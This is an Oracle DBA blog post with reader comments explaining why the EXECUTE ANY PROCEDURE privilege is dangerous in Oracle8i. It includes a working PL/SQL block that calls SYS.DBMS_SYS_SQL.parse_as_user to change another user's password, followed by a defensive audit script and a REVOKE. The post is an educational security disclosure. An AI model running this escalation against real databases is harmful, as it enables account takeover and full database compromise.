
Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?

Author: eygle | (When reprinting, please credit the article and its author with a hyperlink and keep this notice.)
TOM has said more than once:
All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and 
I can totally do anything I want to in your database.
So where does the danger of EXECUTE ANY PROCEDURE come from?
Let us look at an example to understand this danger.
1. Create the test users
$ sqlplus "/ as sysdba"

SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005

(c) Copyright 2000 Oracle Corporation.  All rights reserved.


Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production

SQL> create user hacker identified by hacker default tablespace users temporary  
  2  tablespace temp;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant execute any procedure to hacker;

Grant succeeded.

SQL> create user loser identified by loser default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant connect to loser;

Grant succeeded.


2. Connect as the test user
Note that at this point user hacker has the privilege to access and execute the dbms_sys_sql package.
SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 N_TAB                          TABLE OF NUMBER         IN
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 C_TAB                          TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 VALUE                          ROWID                   OUT


3. What does this mean?

SQL> connect hacker/hacker
Connected.

SQL> DECLARE
  2     UID       NUMBER;
  3     sqltext   VARCHAR2 (100) := 'alter user loser identified by test';
  4     c         INTEGER;
  5  BEGIN
  6     c := SYS.DBMS_SYS_SQL.open_cursor ();
  7     SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
  8     SYS.DBMS_SYS_SQL.close_cursor (c);
  9      END;
 10  /
  
PL/SQL procedure successfully completed.

Through DBMS_SYS_SQL.parse_as_user, hacker can do whatever he likes inside the database.
The password of user loser has already been changed:
SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied


Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.

SQL> 

4. Note the version
In fact this bug only exists in Oracle8i. Starting with Oracle9i, even holding the execute any procedure privilege is no longer enough to access DBMS_SYS_SQL.
SQL> grant execute any procedure to test;

Grant succeeded.

Elapsed: 00:00:00.33
SQL> connect test/test
Connected.
SQL> desc dbms_sys_sql
ERROR:
ORA-04043: object dbms_sys_sql does not exist


SQL> desc sys.dbms_sys_sql
ERROR:
ORA-04043: object sys.dbms_sys_sql does not exist


SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
PL/SQL Release 9.2.0.4.0 - Production
CORE    9.2.0.3.0       Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Elapsed: 00:00:00.32

The Oracle world is becoming safer as well.
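As an added example (not part of the original post), a DBA can audit who actually holds this privilege, including users who inherit it through nested roles, who has a direct EXECUTE grant on SYS.DBMS_SYS_SQL, and whether the parameter that controls access to SYS-owned objects is set to the safe value. Only DBA_* views, V$PARAMETER and CONNECT BY are used, so it runs on 8i as well as later releases; the account in the REVOKE is the test user created above.

```sql
-- Added audit script (not from the original post). Run as a DBA, e.g. SYS.
-- Only DBA_* views and CONNECT BY are used, so it works on 8i and later.

-- 1. Every USER (roles filtered out) holding EXECUTE ANY PROCEDURE,
--    whether granted directly or inherited through nested roles.
SELECT DISTINCT p.holder, p.how
  FROM (
        SELECT sp.grantee AS holder, 'DIRECT' AS how
          FROM dba_sys_privs sp
         WHERE sp.privilege = 'EXECUTE ANY PROCEDURE'
        UNION ALL
        -- start at each role that holds the privilege and walk down the
        -- role tree to every grantee that receives that role
        SELECT rp.grantee AS holder, 'VIA ROLE ' || rp.granted_role AS how
          FROM dba_role_privs rp
         START WITH rp.granted_role IN
               (SELECT grantee FROM dba_sys_privs
                 WHERE privilege = 'EXECUTE ANY PROCEDURE')
       CONNECT BY PRIOR rp.grantee = rp.granted_role
       ) p
 WHERE p.holder IN (SELECT username FROM dba_users)
 ORDER BY p.holder, p.how;

-- 2. Direct object grants on the package itself (a grant to PUBLIC would
--    expose it to every account regardless of ANY privileges).
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_SYS_SQL';

-- 3. On 9i and later, ANY privileges stop reaching SYS-owned objects only
--    while O7_DICTIONARY_ACCESSIBILITY is FALSE (the new default);
--    TRUE restores the 8i behaviour shown in this post, so check it.
SELECT name, value
  FROM v$parameter
 WHERE UPPER(name) = 'O7_DICTIONARY_ACCESSIBILITY';

-- 4. Remediation for the test account created in this post.
REVOKE EXECUTE ANY PROCEDURE FROM hacker;
```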

By eygle on 2005-05-10 10:19 | Comments (3) | Posted to SQL.PLSQL


Comments (3)

Nice. ANY system privileges must be handled with great care. Holding EXECUTE ANY PROCEDURE together with CREATE ANY PROCEDURE effectively means holding every privilege.

    Posted by: yangtingkun at May 13, 2005 3:02 PM

Actually, the EXECUTE ANY PROCEDURE privilege alone is enough; the CREATE ANY PROCEDURE privilege can be obtained by oneself.

In Oracle8i, of course.

    Posted by: eygle at May 13, 2005 11:00 PM

"In fact this bug only exists in Oracle8i; starting with Oracle9i, even holding the execute any procedure privilege is not enough to access DBMS_SYS_SQL"?
Master, I did not expect that the problem I am studying now is one you had already worked through a year ago, ha, impressive. But there is something I do not quite understand: my test environment here is Oracle 9.2.0.4 + linux, and yet, following your steps, I get the same result as you did, so why do you still say it is "not enough to access"??? Also, are there any other experiments on ANY privileges? Ha, a bit greedy, but I am mainly very interested, ha, thanks. Looking forward to your e-mail.

    Posted by: tetian at September 20, 2006 5:43 PM
